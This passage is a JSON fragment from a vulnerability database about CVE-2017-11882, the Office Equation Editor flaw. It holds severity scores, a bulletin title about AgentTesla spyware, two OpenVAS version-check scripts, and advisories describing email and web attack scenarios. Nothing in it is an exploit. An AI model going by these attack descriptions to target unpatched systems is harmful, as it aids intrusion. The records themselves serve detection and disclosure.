\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-28T00:00:00", "title": "Wary of the use of the Office vulnerabilities to spread commercial spyware AgentTesla-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2019-05-28T00:00:00", "id": "MYHACK58:62201994299", "href": "http://www.myhack58.com/Article/html/3/62/2019/94299.htm", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-06-08T23:35:34", "description": "This host is missing an important security\n update according to Microsoft KB3162047", "cvss3": {}, "published": "2017-11-15T00:00:00", "type": "openvas", "title": "Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3162047)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812083", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812083", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3162047)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812083\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11882\");\n script_bugtraq_id(101757);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 07:01:17 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3162047)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3162047\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists 
due to an error in Microsoft\n Office software when the software fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to run arbitrary code in the context\n of the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2013 Service Pack 1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3162047\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noffVer = get_kb_item(\"MS/Office/Ver\");\nif(!offVer || offVer !~ \"^15\\.\"){\n exit(0);\n}\n\nmsPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(msPath)\n{\n offPath = msPath + \"\\Microsoft Shared\\EQUATION\" ;\n msdllVer = fetch_file_version(sysPath:offPath, file_name:\"eqnedt32.exe\");\n if(!msdllVer){\n exit(0);\n }\n\n if(version_is_less(version:msdllVer, test_version:\"2017.8.14.0\"))\n {\n report = report_fixed_ver( file_checked:offPath + \"\\eqnedt32.exe\",\n file_version:msdllVer, vulnerable_range:\"Less than 2017.8.14.0\");\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "description": "This host is missing an 
important security\n update according to Microsoft KB4011276", "cvss3": {}, "published": "2017-11-15T00:00:00", "type": "openvas", "title": "Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB4011276)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812148", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB4011276)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812148\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11882\");\n script_bugtraq_id(101757);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 13:22:30 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB4011276)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4011276\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to the software fails\n to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2007 Service Pack 3.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4011276\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noffVer = get_kb_item(\"MS/Office/Ver\");\nif(!offVer || offVer !~ \"^12\\.\"){\n exit(0);\n}\n\nmsPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(msPath)\n{\n offPath = msPath + \"\\Microsoft Shared\\EQUATION\" ;\n msdllVer = fetch_file_version(sysPath:offPath, file_name:\"eqnedt32.exe\");\n if(!msdllVer){\n exit(0);\n }\n\n if(version_is_less(version:msdllVer, test_version:\"2017.8.14.0\"))\n {\n report = report_fixed_ver( file_checked:offPath + \"\\eqnedt32.exe\",\n file_version:msdllVer, vulnerable_range:\"Less than 2017.8.14.0\");\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:41:39", "description": "A remote code execution vulnerability exists in Microsoft Office Equation Editor. The vulnerability is due to an error in the way Microsoft Office improperly handles objects in memory while parsing specially crafted files. 
A remote attacker can exploit this issue by enticing a victim to open a specially crafted file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Office Memory Corruption Remote Code Execution (CVE-2017-11882)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2018-10-29T00:00:00", "id": "CPAI-2017-1009", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-12-06T18:25:21", "description": "A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office or Microsoft WordPad software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe security update addresses the vulnerability by correcting how the affected Office component handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-14T08:00:00", "type": "mscve", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2017-11-29T08:00:00", "id": "MS:CVE-2017-11882", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}